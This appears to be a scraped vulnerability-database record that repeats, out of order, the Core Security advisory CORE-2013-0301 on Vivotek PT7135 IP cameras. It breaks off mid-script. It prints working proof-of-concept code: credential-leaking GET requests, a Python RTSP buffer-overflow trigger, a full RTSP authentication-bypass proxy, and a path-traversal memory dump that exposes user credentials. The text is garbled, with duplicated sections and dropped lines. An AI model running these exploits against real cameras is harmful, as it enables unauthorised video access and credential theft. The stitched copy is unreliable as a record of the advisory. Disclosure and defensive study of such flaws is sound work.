3. *Vulnerability Description*
Multiple vulnerabilities have been found in Vivotek IP cameras [1] (and
potentially cameras from other vendors sharing the affected firmware)
that could allow an unauthenticated remote attacker:
1. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0834 | CVE-2013-1594 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Information Disclosure vulnerability exists via a GET request in Vivotek PT7135 IP Camera 0300a and 0400a due to wireless keys and 3rd party credentials stored in clear text. Vivotek PT7135 IP Camera Contains an information disclosure vulnerability.Information may be obtained. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Vivotek PT7135 IP camera with firmware 0300a. Vivotek PT7135 IP camera with firmware 0400a. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0835 | CVE-2013-1595 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A Buffer Overflow vulnerability exists in Vivotek PT7135 IP Camera 0300a and 0400a via a specially crafted packet in the Authorization header field sent to the RTSP service, which could let a remote malicious user execute arbitrary code or cause a Denial of Service. Vivotek PT7135 IP Camera Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Attackers can exploit this issue to execute arbitrary code in the context of the affected device. Failed attacks will cause denial-of-service conditions.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
